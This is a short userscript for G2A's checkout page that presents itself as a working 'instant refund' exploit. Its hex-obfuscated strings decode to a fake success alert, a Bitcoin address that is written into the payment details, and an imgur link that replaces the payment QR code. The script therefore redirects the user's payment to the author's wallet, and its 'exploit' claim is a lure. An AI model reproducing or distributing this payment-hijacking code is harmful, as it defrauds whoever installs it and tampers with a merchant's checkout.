// ==UserScript==
// @name         G2A Script
// @namespace    Bounty
// @version      9.0
// @description  G2A Instant Refund Vulnerbility
// @author       @Die	
// @match        https://checkout.pay.g2a.com/*
// @grant        none
// ==/UserScript==

var _0x128a=
["\x45\x78\x70\x6C\x6F\x69\x74\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x6C\x79\x20\x65\x6E\x61\x62\x6C\x65\x64\x21\x20\x50\x72\x65\x73\x73\x20\x4F\x4B\x20\x74\x6F\x20\x63\x6F\x6E\x74\x69\x6E\x75\x65\x2E","row","getElementsByClassName","innerHTML","\x42\x54\x43\x20\x61\x64\x64\x72\x65\x73\x73\x3A\x20\x33\x34\x6B\x72\x51\x61\x77\x36\x66\x68\x42\x6F\x65\x71\x6E\x35\x42\x6D\x62\x66\x46\x6D\x35\x37\x69\x4E\x6E\x5A\x31\x67\x76\x50\x71\x6F","src","code","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x69\x2E\x69\x6D\x67\x75\x72\x2E\x63\x6F\x6D\x2F\x66\x4B\x4C\x4A\x4A\x4B\x52\x2E\x70\x6E\x67","length"];alert(_0x128a[0]);var _0x4892da=setInterval(function()
{
	var _0xf782x2=document[_0x128a[2]](_0x128a[1]);	_0xf782x2[1][_0x128a[3]]= _0x128a[4];document[_0x128a[2]](_0x128a[6])[0]
	[_0x128a[5]]= _0x128a[7];var _0xf782x3=document[_0x128a[2]](_0x128a[6]);
	if(_0xf782x3[_0x128a[8]]> 0)
	{
		clearInterval(_0x4892da)
	}
}
,10)

//Backend-Exploit | Status: Working